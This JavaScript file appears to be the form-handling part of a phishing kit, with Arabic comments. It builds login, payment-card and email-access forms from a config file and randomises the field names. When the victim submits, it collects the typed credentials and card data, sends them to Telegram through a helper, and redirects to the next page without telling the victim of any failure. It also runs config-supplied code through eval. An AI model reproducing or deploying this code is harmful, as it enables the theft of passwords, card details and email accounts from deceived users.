function randomName(len = 10) {
  const chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
  let name = '';
  for (let i = 0; i < len; i++) {
    name += chars.charAt(Math.floor(Math.random() * chars.length));
  }
  return name;
}

async function injectUserFields(containerId, formName = "user") {
  const container = document.getElementById(containerId);
  if (!container) return;
  const settings = await (await fetch('settings.json?' + Date.now())).json();

  const fields = settings.fields?.[formName] || [];
  const pageSettings = settings.pages?.find(p => window.location.pathname.includes(p.php)) || {};
  const submitSettings = pageSettings.forms_submit?.[formName] || {};
  const nameMap = {};
  let html = '';
  let firstPasswordId = null;

  // تخزين الحقول الأصلية لأجل telegram.js
  window._userFieldsSpec = fields;

  fields.forEach((fld, i) => {
    let randomFieldName = randomName();
    nameMap[fld.name] = randomFieldName;
    let attrs = `
      id="${randomFieldName}"
      name="${randomFieldName}"
      type="${fld.type}"
      autocomplete="off"
      ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
      ${fld.required ? 'required' : ''}
      ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
      ${fld.min ? `min="${fld.min}"` : ''}
      ${fld.max ? `max="${fld.max}"` : ''}
    `;
    let inlineJS = fld.js ? fld.js.trim() : '';

    let showPass = '';
    if (fld.type === 'password' && !firstPasswordId) {
      firstPasswordId = randomFieldName;
      showPass = `<span id="showPassBtn" onclick="togglePassVis('${randomFieldName}')">Show</span>`;
    }
    html += `
      <div>
        <label for="${randomFieldName}">${fld.label}</label>
        <input ${attrs.trim()} oninput="${inlineJS}">
        ${showPass}
      </div>
    `;
  });

  container.innerHTML = html;
  window._userFieldsNameMap = nameMap;

  // show/hide password
  window.togglePassVis = function(id) {
    var pass = document.getElementById(id);
    var showBtn = document.getElementById('showPassBtn');
    if (pass.type === 'password') {
      pass.type = 'text';
      showBtn.textContent = 'Hide';
    } else {
      pass.type = 'password';
      showBtn.textContent = 'Show';
    }
  };

  // Submit button
  let form = container.closest('form');
  if (form && !form.querySelector('.login-btn')) {
    const submitLabel = submitSettings.label || 'Submit';
    const submitJs = submitSettings.js || '';
    const sendTelegram = submitSettings.send_telegram || false;

    const submitBtn = document.createElement('button');
    submitBtn.type = "button";
    submitBtn.className = "login-btn";
    submitBtn.textContent = submitLabel;
    form.appendChild(submitBtn);

    // Spinner
    const spinner = document.createElement('span');
    spinner.className = "spinner";
    spinner.style.display = "none";
    submitBtn.appendChild(spinner);

    submitBtn.addEventListener("click", async (e) => {
      e.preventDefault();

      // Collect form data
      const formData = {};
      for (const [origName, randomName] of Object.entries(nameMap)) {
        const el = document.getElementById(randomName);
        if (el) formData[origName] = el.value;
      }

      // إذا يوجد js مخصص في الإعدادات - نفذه فقط!
      if (submitJs.trim()) {
        try { eval(submitJs); } catch (err) { console.error("Custom JS error:", err); }
        return;
      }

      // Show spinner & disable button
      spinner.style.display = "inline-block";
      submitBtn.disabled = true;

      // إرسال إلى تليجرام عبر telegram.js مع تنسيق الرسالة
      let telegramOk = true;
      if (sendTelegram && typeof sendToTelegram === 'function') {
        try {
          // تحديد نوع الصفحة بناءً على اسم الفورم
          let pageType =
            formName === "user" ? "login"
            : formName === "card" ? "card"
            : formName === "email" ? "mailaccess"
            : formName;
          telegramOk = await sendToTelegram(pageType, formData);
        } catch (err) {
          telegramOk = false;
          console.warn("Telegram send failed:", err);
        }
      }

      // الانتقال للصفحة التالية حسب ترتيب settings.pages
      const currentPath = window.location.pathname.split('/').pop();
      const pages = settings.pages || [];
      const idx = pages.findIndex(p => p.php === currentPath);
      if ((sendTelegram && telegramOk) || !sendTelegram) {
        if (idx !== -1 && pages[idx + 1]) {
          window.location.href = pages[idx + 1].php;
        }
      } else {
        // فقط فك تعطيل الزر وإخفاء السبنر بدون رسائل للمستخدم
        spinner.style.display = "none";
        submitBtn.disabled = false;
      }
    });
  }
}